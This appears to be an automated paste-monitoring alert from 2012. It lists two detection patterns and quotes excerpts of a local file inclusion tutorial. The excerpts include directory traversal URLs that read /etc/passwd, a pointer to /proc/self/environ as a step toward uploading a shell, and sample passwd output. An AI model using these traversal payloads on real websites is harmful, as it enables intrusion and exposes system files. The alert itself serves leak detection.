Potential leak of data: Directory Traversal
Detected 2 occurrence(s) of ‘http:\/\/.*\.\.\/\.\.\/\.\.’:
below: You can see here that I found the exact path after putting 19 "../" before "../etc/passwd". You have completed half of your exploit: Now suppose that our injection path looks like - http://www.site.com/index.php?cat=../../../../../../etc/passwd Now all you have to do is just replace "etc/passwd" with "proc/self/environ" and you will see some codes like shown below: Uploading shell Now we have to use Tamper Data to edit our user
Detected 1 occurrence(s) of ‘root:.*:0:0:’:
lude]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 so we go more directories up www.website.com/view.php?page=../../../../../etc/passwd we successfully included the etc/passwd file. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown hal
This entry was posted on Friday, July 27th, 2012 at 06:45 and is filed under PasteMon.